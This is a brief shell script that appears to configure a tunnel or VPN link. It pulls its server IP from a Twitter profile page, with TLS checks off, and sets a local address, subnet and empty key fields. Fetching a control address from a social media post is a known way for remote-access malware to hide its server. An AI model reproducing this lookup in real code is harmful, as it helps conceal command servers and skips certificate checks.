#!/bin/sh
SERVERIP="$( wget --no-check-certificate -q -O - https://twitter.com/RatEnterprises  | grep -Eo -m1 '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' )"
LOCALADDRESS=192.168.2.45
PRIVKEY=
PEER=
SUBNET=192.168.2.0
MASK=24
